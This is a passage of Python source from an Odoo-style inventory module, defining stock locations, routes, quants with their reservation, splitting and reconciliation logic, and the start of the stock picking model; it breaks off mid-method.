\n* Procurement: Virtual location serving as temporary counterpart for procurement operations when the source (vendor or production) is not known yet. This location should be empty when the procurement scheduler has finished running.
\n* Production: Virtual counterpart location for production operations: this location consumes the raw material and produces finished products
\n* Transit Location: Counterpart location that should be used in inter-companies or inter-warehouses operations
""", select=True),
'complete_name': fields.function(_complete_name, type='char', string="Full Location Name",
store={'stock.location': (_get_sublocations, ['name', 'location_id', 'active'], 10)}),
'location_id': fields.many2one('stock.location', 'Parent Location', select=True, ondelete='cascade'),
'child_ids': fields.one2many('stock.location', 'location_id', 'Contains'),
'partner_id': fields.many2one('res.partner', 'Owner', help="Owner of the location if not internal"),
'comment': fields.text('Additional Information'),
'posx': fields.integer('Corridor (X)', help="Optional localization details, for information purpose only"),
'posy': fields.integer('Shelves (Y)', help="Optional localization details, for information purpose only"),
'posz': fields.integer('Height (Z)', help="Optional localization details, for information purpose only"),
'parent_left': fields.integer('Left Parent', select=1),
'parent_right': fields.integer('Right Parent', select=1),
'company_id': fields.many2one('res.company', 'Company', select=1, help='Let this field empty if this location is shared between companies'),
'scrap_location': fields.boolean('Is a Scrap Location?', help='Check this box to allow using this location to put scrapped/damaged goods.'),
'return_location': fields.boolean('Is a Return Location?', help='Check this box to allow using this location as a return location.'),
'removal_strategy_id': fields.many2one('product.removal', 'Removal Strategy', help="Defines the default method used for suggesting the exact location (shelf) where to take the products from, which lot etc. for this location. This method can be enforced at the product category level, and a fallback is made on the parent locations if none is set here."),
'putaway_strategy_id': fields.many2one('product.putaway', 'Put Away Strategy', help="Defines the default method used for suggesting the exact location (shelf) where to store the products. This method can be enforced at the product category level, and a fallback is made on the parent locations if none is set here."),
'barcode': fields.char('Barcode', copy=False, oldname='loc_barcode'),
}
_defaults = {
'active': True,
'usage': 'internal',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location', context=c),
'posx': 0,
'posy': 0,
'posz': 0,
'scrap_location': False,
}
_sql_constraints = [('barcode_company_uniq', 'unique (barcode,company_id)', 'The barcode for a location must be unique per company !')]
def create(self, cr, uid, default, context=None):
if not default.get('barcode', False):
default.update({'barcode': default.get('complete_name', False)})
return super(stock_location, self).create(cr, uid, default, context=context)
def get_putaway_strategy(self, cr, uid, location, product, context=None):
''' Returns the location where the product has to be put, if any compliant putaway strategy is found. Otherwise returns None.'''
putaway_obj = self.pool.get('product.putaway')
loc = location
while loc:
if loc.putaway_strategy_id:
res = putaway_obj.putaway_apply(cr, uid, loc.putaway_strategy_id, product, context=context)
if res:
return res
loc = loc.location_id
def _default_removal_strategy(self, cr, uid, context=None):
return 'fifo'
def get_removal_strategy(self, cr, uid, qty, move, ops=False, context=None):
''' Returns the removal strategy to consider for the given move/ops
:rtype: char
'''
product = move.product_id
location = move.location_id
if product.categ_id.removal_strategy_id:
return product.categ_id.removal_strategy_id.method
loc = location
while loc:
if loc.removal_strategy_id:
return loc.removal_strategy_id.method
loc = loc.location_id
return self._default_removal_strategy(cr, uid, context=context)
def get_warehouse(self, cr, uid, location, context=None):
"""
Returns warehouse id of warehouse that contains location
:param location: browse record (stock.location)
"""
wh_obj = self.pool.get("stock.warehouse")
whs = wh_obj.search(cr, uid, [('view_location_id.parent_left', '<=', location.parent_left),
('view_location_id.parent_right', '>=', location.parent_left)], context=context)
return whs and whs[0] or False
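# --- Editor's illustrative sketch (not part of the original module) ---
# Typical old-API usage of the location model above, e.g. from another addon
# or a test; the parent location and values shown are hypothetical:
#
#     location_obj = self.pool.get('stock.location')
#     shelf_id = location_obj.create(cr, uid, {
#         'name': 'Shelf A',
#         'usage': 'internal',
#         'location_id': warehouse.lot_stock_id.id,   # assumed parent location
#     }, context=context)
#     shelf = location_obj.browse(cr, uid, shelf_id, context=context)
#     # complete_name is computed from the parent chain, e.g. 'WH/Stock/Shelf A',
#     # and get_warehouse() resolves the warehouse whose view location contains it:
#     wh_id = location_obj.get_warehouse(cr, uid, shelf, context=context)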
#----------------------------------------------------------
# Routes
#----------------------------------------------------------
class stock_location_route(osv.osv):
_name = 'stock.location.route'
_description = "Inventory Routes"
_order = 'sequence'
_columns = {
'name': fields.char('Route Name', required=True, translate=True),
'sequence': fields.integer('Sequence'),
'pull_ids': fields.one2many('procurement.rule', 'route_id', 'Procurement Rules', copy=True),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the route without removing it."),
'push_ids': fields.one2many('stock.location.path', 'route_id', 'Push Rules', copy=True),
'product_selectable': fields.boolean('Applicable on Product', help="When checked, the route will be selectable in the Inventory tab of the Product form. It will take priority over the Warehouse route. "),
'product_categ_selectable': fields.boolean('Applicable on Product Category', help="When checked, the route will be selectable on the Product Category. It will take priority over the Warehouse route. "),
'warehouse_selectable': fields.boolean('Applicable on Warehouse', help="When a warehouse is selected for this route, this route should be seen as the default route when products pass through this warehouse. This behaviour can be overridden by the routes on the Product/Product Categories or by the Preferred Routes on the Procurement"),
'supplied_wh_id': fields.many2one('stock.warehouse', 'Supplied Warehouse'),
'supplier_wh_id': fields.many2one('stock.warehouse', 'Supplying Warehouse'),
'company_id': fields.many2one('res.company', 'Company', select=1, help='Leave this field empty if this route is shared between all companies'),
#Reverse many2many fields:
'product_ids': fields.many2many('product.template', 'stock_route_product', 'route_id', 'product_id', 'Products'),
'categ_ids': fields.many2many('product.category', 'stock_location_route_categ', 'route_id', 'categ_id', 'Product Categories'),
'warehouse_ids': fields.many2many('stock.warehouse', 'stock_route_warehouse', 'route_id', 'warehouse_id', 'Warehouses'),
}
_defaults = {
'sequence': lambda self, cr, uid, ctx: 0,
'active': True,
'product_selectable': True,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location.route', context=c),
}
def write(self, cr, uid, ids, vals, context=None):
'''when a route is deactivated, deactivate also its pull and push rules'''
if isinstance(ids, (int, long)):
ids = [ids]
res = super(stock_location_route, self).write(cr, uid, ids, vals, context=context)
if 'active' in vals:
push_ids = []
pull_ids = []
for route in self.browse(cr, uid, ids, context=context):
if route.push_ids:
push_ids += [r.id for r in route.push_ids if r.active != vals['active']]
if route.pull_ids:
pull_ids += [r.id for r in route.pull_ids if r.active != vals['active']]
if push_ids:
self.pool.get('stock.location.path').write(cr, uid, push_ids, {'active': vals['active']}, context=context)
if pull_ids:
self.pool.get('procurement.rule').write(cr, uid, pull_ids, {'active': vals['active']}, context=context)
return res
def view_product_ids(self, cr, uid, ids, context=None):
return {
'name': _('Products'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'product.template',
'type': 'ir.actions.act_window',
'domain': [('route_ids', 'in', ids[0])],
}
def view_categ_ids(self, cr, uid, ids, context=None):
return {
'name': _('Product Categories'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'product.category',
'type': 'ir.actions.act_window',
'domain': [('route_ids', 'in', ids[0])],
}
#----------------------------------------------------------
# Quants
#----------------------------------------------------------
class stock_quant(osv.osv):
"""
Quants are the smallest units of stock; each represents a physical quantity of a product at a location
"""
_name = "stock.quant"
_description = "Quants"
def _get_quant_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for q in self.browse(cr, uid, ids, context=context):
res[q.id] = q.product_id.code or ''
if q.lot_id:
res[q.id] = q.lot_id.name
res[q.id] += ': ' + str(q.qty) + q.product_id.uom_id.name
return res
def _calc_inventory_value(self, cr, uid, ids, name, attr, context=None):
context = dict(context or {})
res = {}
uid_company_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.id
for quant in self.browse(cr, uid, ids, context=context):
context.pop('force_company', None)
if quant.company_id.id != uid_company_id:
#if the company of the quant is different than the current user company, force the company in the context
#then re-do a browse to read the property fields for the good company.
context['force_company'] = quant.company_id.id
quant = self.browse(cr, uid, quant.id, context=context)
res[quant.id] = self._get_inventory_value(cr, uid, quant, context=context)
return res
def _get_inventory_value(self, cr, uid, quant, context=None):
return quant.product_id.standard_price * quant.qty
_columns = {
'name': fields.function(_get_quant_name, type='char', string='Identifier'),
'product_id': fields.many2one('product.product', 'Product', required=True, ondelete="restrict", readonly=True, select=True),
'location_id': fields.many2one('stock.location', 'Location', required=True, ondelete="restrict", readonly=True, select=True, auto_join=True),
'qty': fields.float('Quantity', required=True, help="Quantity of products in this quant, in the default unit of measure of the product", readonly=True, select=True),
'product_uom_id': fields.related('product_id', 'uom_id', type='many2one', relation="product.uom", string='Unit of Measure', readonly=True),
'package_id': fields.many2one('stock.quant.package', string='Package', help="The package containing this quant", readonly=True, select=True),
'packaging_type_id': fields.related('package_id', 'packaging_id', type='many2one', relation='product.packaging', string='Type of packaging', readonly=True, store=True),
'reservation_id': fields.many2one('stock.move', 'Reserved for Move', help="The move the quant is reserved for", readonly=True, select=True),
'lot_id': fields.many2one('stock.production.lot', 'Lot', readonly=True, select=True, ondelete="restrict"),
'cost': fields.float('Unit Cost'),
'owner_id': fields.many2one('res.partner', 'Owner', help="This is the owner of the quant", readonly=True, select=True),
'create_date': fields.datetime('Creation Date', readonly=True),
'in_date': fields.datetime('Incoming Date', readonly=True, select=True),
'history_ids': fields.many2many('stock.move', 'stock_quant_move_rel', 'quant_id', 'move_id', 'Moves', help='Moves that operate(d) on this quant', copy=False),
'company_id': fields.many2one('res.company', 'Company', help="The company to which the quants belong", required=True, readonly=True, select=True),
'inventory_value': fields.function(_calc_inventory_value, string="Inventory Value", type='float', readonly=True),
# Used for negative quants to reconcile after compensated by a new positive one
'propagated_from_id': fields.many2one('stock.quant', 'Linked Quant', help='The negative quant this is coming from', readonly=True, select=True),
'negative_move_id': fields.many2one('stock.move', 'Move Negative Quant', help='If this is a negative quant, this will be the move that caused this negative quant.', readonly=True),
'negative_dest_location_id': fields.related('negative_move_id', 'location_dest_id', type='many2one', relation='stock.location', string="Negative Destination Location", readonly=True,
help="Technical field used to record the destination location of a move that created a negative quant"),
}
_defaults = {
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.quant', context=c),
}
def init(self, cr):
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('stock_quant_product_location_index',))
if not cr.fetchone():
cr.execute('CREATE INDEX stock_quant_product_location_index ON stock_quant (product_id, location_id, company_id, qty, in_date, reservation_id)')
def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False, lazy=True):
''' Overwrite the read_group in order to sum the function field 'inventory_value' in group by'''
res = super(stock_quant, self).read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby, lazy=lazy)
if 'inventory_value' in fields:
for line in res:
if '__domain' in line:
lines = self.search(cr, uid, line['__domain'], context=context)
inv_value = 0.0
for line2 in self.browse(cr, uid, lines, context=context):
inv_value += line2.inventory_value
line['inventory_value'] = inv_value
return res
def action_view_quant_history(self, cr, uid, ids, context=None):
'''
This function returns an action that displays the history of the quant, i.e.
all the stock moves that led to this quant's creation, with this quant's quantity.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_move_form2')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context={})[0]
move_ids = []
for quant in self.browse(cr, uid, ids, context=context):
move_ids += [move.id for move in quant.history_ids]
result['domain'] = "[('id','in',[" + ','.join(map(str, move_ids)) + "])]"
return result
def quants_reserve(self, cr, uid, quants, move, link=False, context=None):
'''This function reserves quants for the given move (and optionally given link). If the total of quantity reserved is enough, the move's state
is also set to 'assigned'
:param quants: list of tuple(quant browse record or None, qty to reserve). If None is given as first tuple element, the item will be ignored. Negative quants should not be received as argument
:param move: browse record
:param link: browse record (stock.move.operation.link)
'''
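# Overall flow: split each quant to the requested qty, write this move as their reservation, then flag the move 'assigned' or 'partially_available' depending on how much is now reserved.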
toreserve = []
reserved_availability = move.reserved_availability
#split quants if needed
for quant, qty in quants:
if qty <= 0.0 or (quant and quant.qty <= 0.0):
raise UserError(_('You can not reserve a negative quantity or a negative quant.'))
if not quant:
continue
self._quant_split(cr, uid, quant, qty, context=context)
toreserve.append(quant.id)
reserved_availability += quant.qty
#reserve quants
if toreserve:
self.write(cr, SUPERUSER_ID, toreserve, {'reservation_id': move.id}, context=context)
#check if the move's state needs to be set to 'assigned'
rounding = move.product_id.uom_id.rounding
if float_compare(reserved_availability, move.product_qty, precision_rounding=rounding) == 0 and move.state in ('confirmed', 'waiting') :
self.pool.get('stock.move').write(cr, uid, [move.id], {'state': 'assigned'}, context=context)
elif float_compare(reserved_availability, 0, precision_rounding=rounding) > 0 and not move.partially_available:
self.pool.get('stock.move').write(cr, uid, [move.id], {'partially_available': True}, context=context)
def quants_move(self, cr, uid, quants, move, location_to, location_from=False, lot_id=False, owner_id=False, src_package_id=False, dest_package_id=False, entire_pack=False, context=None):
"""Moves all given stock.quant in the given destination location. Unreserve from current move.
:param quants: list of tuple(browse record(stock.quant) or None, quantity to move)
:param move: browse record (stock.move)
:param location_to: browse record (stock.location) depicting where the quants have to be moved
:param location_from: optional browse record (stock.location) explaining where the quant has to be taken (may differ from the move source location in case a removal strategy is applied). This parameter is only passed to _quant_create if a negative quant must be created
:param lot_id: ID of the lot that must be set on the quants to move
:param owner_id: ID of the partner that must own the quants to move
:param src_package_id: ID of the package that contains the quants to move
:param dest_package_id: ID of the package that must be set on the moved quant
"""
quants_reconcile = []
to_move_quants = []
self._check_location(cr, uid, location_to, context=context)
check_lot = False
for quant, qty in quants:
if not quant:
#If quant is None, we will create a quant to move (and potentially a negative counterpart too)
quant = self._quant_create(cr, uid, qty, move, lot_id=lot_id, owner_id=owner_id, src_package_id=src_package_id, dest_package_id=dest_package_id, force_location_from=location_from, force_location_to=location_to, context=context)
check_lot = True
else:
self._quant_split(cr, uid, quant, qty, context=context)
to_move_quants.append(quant)
quants_reconcile.append(quant)
if to_move_quants:
to_recompute_move_ids = [x.reservation_id.id for x in to_move_quants if x.reservation_id and x.reservation_id.id != move.id]
self.move_quants_write(cr, uid, to_move_quants, move, location_to, dest_package_id, lot_id=lot_id, entire_pack=entire_pack, context=context)
self.pool.get('stock.move').recalculate_move_state(cr, uid, to_recompute_move_ids, context=context)
if location_to.usage == 'internal':
# Do manual search for quant to avoid full table scan (order by id)
cr.execute("""
SELECT 0 FROM stock_quant, stock_location WHERE product_id = %s AND stock_location.id = stock_quant.location_id AND
((stock_location.parent_left >= %s AND stock_location.parent_left < %s) OR stock_location.id = %s) AND qty < 0.0 LIMIT 1
""", (move.product_id.id, location_to.parent_left, location_to.parent_right, location_to.id))
if cr.fetchone():
for quant in quants_reconcile:
self._quant_reconcile_negative(cr, uid, quant, move, context=context)
# In case of serial tracking, check if the product does not exist somewhere internally already
# Checking that a positive quant already exists in an internal location is too restrictive.
# Indeed, if a warehouse is configured with several steps (e.g. "Pick + Pack + Ship") and
# one step is forced (creates a quant of qty = -1.0), it is not possible afterwards to
# correct the inventory unless the product leaves the stock.
picking_type = move.picking_id and move.picking_id.picking_type_id or False
if check_lot and lot_id and move.product_id.tracking == 'serial' and (not picking_type or (picking_type.use_create_lots or picking_type.use_existing_lots)):
other_quants = self.search(cr, uid, [('product_id', '=', move.product_id.id), ('lot_id', '=', lot_id),
('location_id.usage', '=', 'internal')], context=context)
if other_quants:
# We raise an error if:
# - the total quantity is strictly larger than 1.0
# - there are more than one negative quant, to avoid situations where the user would
# force the quantity at several steps of the process
other_quants = self.browse(cr, uid, other_quants, context=context)
if sum(other_quants.mapped('qty')) > 1.0 or len([q for q in other_quants.mapped('qty') if q < 0]) > 1:
lot_name = self.pool['stock.production.lot'].browse(cr, uid, lot_id, context=context).name
raise UserError(_('The serial number %s is already in stock.') % lot_name + _("Otherwise make sure the right stock/owner is set."))
def move_quants_write(self, cr, uid, quants, move, location_dest_id, dest_package_id, lot_id = False, entire_pack=False, context=None):
context=context or {}
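# (4, move.id) in history_ids is the ORM 'link' command: it appends this move to each quant's history without removing the existing links.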
vals = {'location_id': location_dest_id.id,
'history_ids': [(4, move.id)],
'reservation_id': False}
if lot_id and any(x.id for x in quants if not x.lot_id.id):
vals['lot_id'] = lot_id
if not entire_pack:
vals.update({'package_id': dest_package_id})
self.write(cr, SUPERUSER_ID, [q.id for q in quants], vals, context=context)
def quants_get_preferred_domain(self, cr, uid, qty, move, ops=False, lot_id=False, domain=None, preferred_domain_list=[], context=None):
''' This function tries to find quants for the given domain and move/ops, by first limiting
the choice to the quants that also match the first item of preferred_domain_list. If the requested qty is not reached,
it tries to find the remaining quantity by looping over preferred_domain_list (second item, and so on).
Make sure the quants aren't found twice => all the domains of preferred_domain_list should be orthogonal
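For example, callers typically pass a preferred_domain_list such as [[('reservation_id', '=', move.id)], [('reservation_id', '=', False)], ['&', ('reservation_id', '!=', move.id), ('reservation_id', '!=', False)]] to prefer quants already reserved for the move, then unreserved quants, then quants reserved for other moves (illustrative example).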
'''
context = context or {}
domain = domain or [('qty', '>', 0.0)]
domain = list(domain)
quants = [(None, qty)]
if ops:
restrict_lot_id = lot_id
location = ops.location_id
if ops.owner_id:
domain += [('owner_id', '=', ops.owner_id.id)]
if ops.package_id and not ops.product_id:
domain += [('package_id', 'child_of', ops.package_id.id)]
elif ops.package_id and ops.product_id:
domain += [('package_id', '=', ops.package_id.id)]
else:
domain += [('package_id', '=', False)]
domain += [('location_id', '=', ops.location_id.id)]
else:
restrict_lot_id = move.restrict_lot_id.id
location = move.location_id
if move.restrict_partner_id:
domain += [('owner_id', '=', move.restrict_partner_id.id)]
domain += [('location_id', 'child_of', move.location_id.id)]
if context.get('force_company'):
domain += [('company_id', '=', context.get('force_company'))]
else:
domain += [('company_id', '=', move.company_id.id)]
removal_strategy = self.pool.get('stock.location').get_removal_strategy(cr, uid, qty, move, ops=ops, context=context)
product = move.product_id
domain += [('product_id', '=', move.product_id.id)]
#don't look for quants in locations that are of type production, supplier or inventory.
if location.usage in ['inventory', 'production', 'supplier']:
return quants
res_qty = qty
if restrict_lot_id:
if not preferred_domain_list:
preferred_domain_list = [[('lot_id', '=', restrict_lot_id)], [('lot_id', '=', False)]]
else:
lot_list = []
no_lot_list = []
for pref_domain in preferred_domain_list:
pref_lot_domain = pref_domain + [('lot_id', '=', restrict_lot_id)]
pref_no_lot_domain = pref_domain + [('lot_id', '=', False)]
lot_list.append(pref_lot_domain)
no_lot_list.append(pref_no_lot_domain)
preferred_domain_list = lot_list + no_lot_list
if not preferred_domain_list:
return self.quants_get(cr, uid, qty, move, ops=ops, domain=domain, removal_strategy=removal_strategy, context=context)
for preferred_domain in preferred_domain_list:
res_qty_cmp = float_compare(res_qty, 0, precision_rounding=product.uom_id.rounding)
if res_qty_cmp > 0:
#try to replace the last tuple (None, res_qty) with something that wasn't chosen at first because of the preferred order
quants.pop()
tmp_quants = self.quants_get(cr, uid, res_qty, move, ops=ops, domain=domain + preferred_domain,
removal_strategy=removal_strategy, context=context)
for quant in tmp_quants:
if quant[0]:
res_qty -= quant[1]
quants += tmp_quants
return quants
def quants_get(self, cr, uid, qty, move, ops=False, domain=None, removal_strategy='fifo', context=None):
"""
Use the removal strategy of the product to search for the correct quants.
If you inherit, put the super at the end of your method.
:param move: browse record (stock.move) whose product is searched for
:param qty: quantity to find, expressed in the default UoM of the product
"""
domain = domain or [('qty', '>', 0.0)]
return self.apply_removal_strategy(cr, uid, qty, move, ops=ops, domain=domain, removal_strategy=removal_strategy, context=context)
def apply_removal_strategy(self, cr, uid, quantity, move, ops=False, domain=None, removal_strategy='fifo', context=None):
if removal_strategy == 'fifo':
order = 'in_date, id'
return self._quants_get_order(cr, uid, quantity, move, ops=ops, domain=domain, orderby=order, context=context)
elif removal_strategy == 'lifo':
order = 'in_date desc, id desc'
return self._quants_get_order(cr, uid, quantity, move, ops=ops, domain=domain, orderby=order, context=context)
raise UserError(_('Removal strategy %s not implemented.') % (removal_strategy,))
def _quant_create(self, cr, uid, qty, move, lot_id=False, owner_id=False, src_package_id=False, dest_package_id=False,
force_location_from=False, force_location_to=False, context=None):
'''Create a quant in the destination location and create a negative quant in the source location if it's an internal location.
'''
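# The new quant mirrors the move's product and company, takes its cost from the move's price unit and, when the source is an internal location, gets a negative counterpart quant linked through propagated_from_id.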
if context is None:
context = {}
price_unit = self.pool.get('stock.move').get_price_unit(cr, uid, move, context=context)
location = force_location_to or move.location_dest_id
rounding = move.product_id.uom_id.rounding
vals = {
'product_id': move.product_id.id,
'location_id': location.id,
'qty': float_round(qty, precision_rounding=rounding),
'cost': price_unit,
'history_ids': [(4, move.id)],
'in_date': datetime.now().strftime(DEFAULT_SERVER_DATETIME_FORMAT),
'company_id': move.company_id.id,
'lot_id': lot_id,
'owner_id': owner_id,
'package_id': dest_package_id,
}
if move.location_id.usage == 'internal':
#if we were trying to move something from an internal location and reach here (quant creation),
#it means that a negative quant has to be created as well.
negative_vals = vals.copy()
negative_vals['location_id'] = force_location_from and force_location_from.id or move.location_id.id
negative_vals['qty'] = float_round(-qty, precision_rounding=rounding)
negative_vals['cost'] = price_unit
negative_vals['negative_move_id'] = move.id
negative_vals['package_id'] = src_package_id
negative_quant_id = self.create(cr, SUPERUSER_ID, negative_vals, context=context)
vals.update({'propagated_from_id': negative_quant_id})
picking_type = move.picking_id and move.picking_id.picking_type_id or False
if lot_id and move.product_id.tracking == 'serial' and (not picking_type or (picking_type.use_create_lots or picking_type.use_existing_lots)):
if qty != 1.0:
raise UserError(_('You should only receive by the piece with the same serial number'))
#create the quant as superuser, because we want to restrict manual creation of quants: this method should always be used to create them
quant_id = self.create(cr, SUPERUSER_ID, vals, context=context)
return self.browse(cr, uid, quant_id, context=context)
def _quant_split(self, cr, uid, quant, qty, context=None):
context = context or {}
rounding = quant.product_id.uom_id.rounding
if float_compare(abs(quant.qty), abs(qty), precision_rounding=rounding) <= 0: # if quant <= qty in abs, take it entirely
return False
qty_round = float_round(qty, precision_rounding=rounding)
new_qty_round = float_round(quant.qty - qty, precision_rounding=rounding)
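# The original quant is trimmed to the requested qty; the copied quant holds the remainder and inherits the full move history.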
# Fetch the history_ids manually, as this avoids a join with the stock moves table (=> a lot faster)
cr.execute("""SELECT move_id FROM stock_quant_move_rel WHERE quant_id = %s""", (quant.id,))
res = cr.fetchall()
new_quant = self.copy(cr, SUPERUSER_ID, quant.id, default={'qty': new_qty_round, 'history_ids': [(4, x[0]) for x in res]}, context=context)
self.write(cr, SUPERUSER_ID, quant.id, {'qty': qty_round}, context=context)
return self.browse(cr, uid, new_quant, context=context)
def _get_latest_move(self, cr, uid, quant, context=None):
move = False
for m in quant.history_ids:
if not move or m.date > move.date:
move = m
return move
@api.cr_uid_ids_context
def _quants_merge(self, cr, uid, solved_quant_ids, solving_quant, context=None):
path = []
for move in solving_quant.history_ids:
path.append((4, move.id))
self.write(cr, SUPERUSER_ID, solved_quant_ids, {'history_ids': path}, context=context)
def _search_quants_to_reconcile(self, cr, uid, quant, context=None):
"""
Searches for negative quants to reconcile in the location where the quant to reconcile was put
"""
dom = [('qty', '<', 0)]
order = 'in_date'
dom += [('location_id', 'child_of', quant.location_id.id), ('product_id', '=', quant.product_id.id),
('owner_id', '=', quant.owner_id.id)]
if quant.package_id.id:
dom += [('package_id', '=', quant.package_id.id)]
if quant.lot_id:
dom += ['|', ('lot_id', '=', False), ('lot_id', '=', quant.lot_id.id)]
order = 'lot_id, in_date'
# Do not let the quant eat itself, or it will kill its history (e.g. returns / Stock -> Stock)
dom += [('id', '!=', quant.propagated_from_id.id)]
quants_search = self.search(cr, uid, dom, order=order, context=context)
product = quant.product_id
quants = []
quantity = quant.qty
for quant in self.browse(cr, uid, quants_search, context=context):
rounding = product.uom_id.rounding
if float_compare(quantity, abs(quant.qty), precision_rounding=rounding) >= 0:
quants += [(quant, abs(quant.qty))]
quantity -= abs(quant.qty)
elif float_compare(quantity, 0.0, precision_rounding=rounding) != 0:
quants += [(quant, quantity)]
quantity = 0
break
return quants
def _quant_reconcile_negative(self, cr, uid, quant, move, context=None):
"""
When a new quant arrives in a location, try to reconcile it with
negative quants. If possible, apply the cost of the new
quant to the counterpart of the negative quant.
"""
context = context or {}
context = dict(context)
context.update({'force_unlink': True})
solving_quant = quant
quants = self._search_quants_to_reconcile(cr, uid, quant, context=context)
product_uom_rounding = quant.product_id.uom_id.rounding
for quant_neg, qty in quants:
if not quant_neg or not solving_quant:
continue
to_solve_quant_ids = self.search(cr, uid, [('propagated_from_id', '=', quant_neg.id)], context=context)
if not to_solve_quant_ids:
continue
solving_qty = qty
solved_quant_ids = []
for to_solve_quant in self.browse(cr, uid, to_solve_quant_ids, context=context):
if float_compare(solving_qty, 0, precision_rounding=product_uom_rounding) <= 0:
continue
solved_quant_ids.append(to_solve_quant.id)
self._quant_split(cr, uid, to_solve_quant, min(solving_qty, to_solve_quant.qty), context=context)
solving_qty -= min(solving_qty, to_solve_quant.qty)
remaining_solving_quant = self._quant_split(cr, uid, solving_quant, qty, context=context)
remaining_neg_quant = self._quant_split(cr, uid, quant_neg, -qty, context=context)
#if the reconciliation was not complete, we need to link together the remaining parts
if remaining_neg_quant:
remaining_to_solve_quant_ids = self.search(cr, uid, [('propagated_from_id', '=', quant_neg.id), ('id', 'not in', solved_quant_ids)], context=context)
if remaining_to_solve_quant_ids:
self.write(cr, SUPERUSER_ID, remaining_to_solve_quant_ids, {'propagated_from_id': remaining_neg_quant.id}, context=context)
if solving_quant.propagated_from_id and solved_quant_ids:
self.write(cr, SUPERUSER_ID, solved_quant_ids, {'propagated_from_id': solving_quant.propagated_from_id.id}, context=context)
#delete the reconciled negative quant, as it is replaced by the solved quants
self.unlink(cr, SUPERUSER_ID, [quant_neg.id], context=context)
if solved_quant_ids:
#price update + accounting entries adjustments
self._price_update(cr, uid, solved_quant_ids, solving_quant.cost, context=context)
#merge history (and cost?)
self._quants_merge(cr, uid, solved_quant_ids, solving_quant, context=context)
self.unlink(cr, SUPERUSER_ID, [solving_quant.id], context=context)
solving_quant = remaining_solving_quant
def _price_update(self, cr, uid, ids, newprice, context=None):
self.write(cr, SUPERUSER_ID, ids, {'cost': newprice}, context=context)
def quants_unreserve(self, cr, uid, move, context=None):
related_quants = [x.id for x in move.reserved_quant_ids]
if related_quants:
#if move has a picking_id, write on that picking that pack_operation might have changed and need to be recomputed
if move.partially_available:
self.pool.get("stock.move").write(cr, uid, [move.id], {'partially_available': False}, context=context)
self.write(cr, SUPERUSER_ID, related_quants, {'reservation_id': False}, context=context)
def _quants_get_order(self, cr, uid, quantity, move, ops=False, domain=[], orderby='in_date', context=None):
''' Implementation of removal strategies
If it can not reserve, it will return a tuple (None, qty)
'''
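# Quants are fetched in batches of 10 in the requested order; if stock runs out, a trailing (None, remaining_qty) tuple signals the shortfall to the caller.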
if context is None:
context = {}
product = move.product_id
res = []
offset = 0
while float_compare(quantity, 0, precision_rounding=product.uom_id.rounding) > 0:
quants = self.search(cr, uid, domain, order=orderby, limit=10, offset=offset, context=context)
if not quants:
res.append((None, quantity))
break
for quant in self.browse(cr, uid, quants, context=context):
rounding = product.uom_id.rounding
if float_compare(quantity, abs(quant.qty), precision_rounding=rounding) >= 0:
res += [(quant, abs(quant.qty))]
quantity -= abs(quant.qty)
elif float_compare(quantity, 0.0, precision_rounding=rounding) != 0:
res += [(quant, quantity)]
quantity = 0
break
offset += 10
return res
def _check_location(self, cr, uid, location, context=None):
if location.usage == 'view':
raise UserError(_('You cannot move to a location of type view %s.') % (location.name))
return True
def unlink(self, cr, uid, ids, context=None):
context = context or {}
if not context.get('force_unlink'):
raise UserError(_('Under no circumstances should you delete or change quants yourselves!'))
super(stock_quant, self).unlink(cr, uid, ids, context=context)
#----------------------------------------------------------
# Stock Picking
#----------------------------------------------------------
class stock_picking(models.Model):
_name = "stock.picking"
_inherit = ['mail.thread']
_description = "Transfer"
_order = "priority desc, date asc, id desc"
def _set_min_date(self, cr, uid, id, field, value, arg, context=None):
move_obj = self.pool.get("stock.move")
if value:
move_ids = [move.id for move in self.browse(cr, uid, id, context=context).move_lines]
move_obj.write(cr, uid, move_ids, {'date_expected': value}, context=context)
def _set_priority(self, cr, uid, id, field, value, arg, context=None):
move_obj = self.pool.get("stock.move")
if value:
move_ids = [move.id for move in self.browse(cr, uid, id, context=context).move_lines]
move_obj.write(cr, uid, move_ids, {'priority': value}, context=context)
def get_min_max_date(self, cr, uid, ids, field_name, arg, context=None):
""" Finds minimum and maximum dates for picking.
@return: Dictionary of values
"""
res = {}
for id in ids:
res[id] = {'min_date': False, 'max_date': False, 'priority': '1'}
if not ids:
return res
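# A single grouped SQL query fetches min/max expected dates and max priority for all pickings at once, instead of reading every move through the ORM.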
cr.execute("""select
picking_id,
min(date_expected),
max(date_expected),
max(priority)
from
stock_move
where
picking_id IN %s
group by
picking_id""", (tuple(ids),))
for pick, dt1, dt2, prio in cr.fetchall():
res[pick]['min_date'] = dt1
res[pick]['max_date'] = dt2
res[pick]['priority'] = prio
return res
def create(self, cr, user, vals, context=None):
context = context or {}
if ('name' not in vals) or (vals.get('name') in ('/', False)):
ptype_id = vals.get('picking_type_id', context.get('default_picking_type_id', False))
sequence_id = self.pool.get('stock.picking.type').browse(cr, user, ptype_id, context=context).sequence_id.id
vals['name'] = self.pool.get('ir.sequence').next_by_id(cr, user, sequence_id, context=context)
# As the on_change in one2many list is WIP, we will overwrite the locations on the stock moves here
# As it is a create the format will be a list of (0, 0, dict)
if vals.get('move_lines') and vals.get('location_id') and vals.get('location_dest_id'):
for move in vals['move_lines']:
if len(move) == 3:
move[2]['location_id'] = vals['location_id']
move[2]['location_dest_id'] = vals['location_dest_id']
return super(stock_picking, self).create(cr, user, vals, context)
def write(self, cr, uid, ids, vals, context=None):
res = super(stock_picking, self).write(cr, uid, ids, vals, context=context)
after_vals = {}
if vals.get('location_id'):
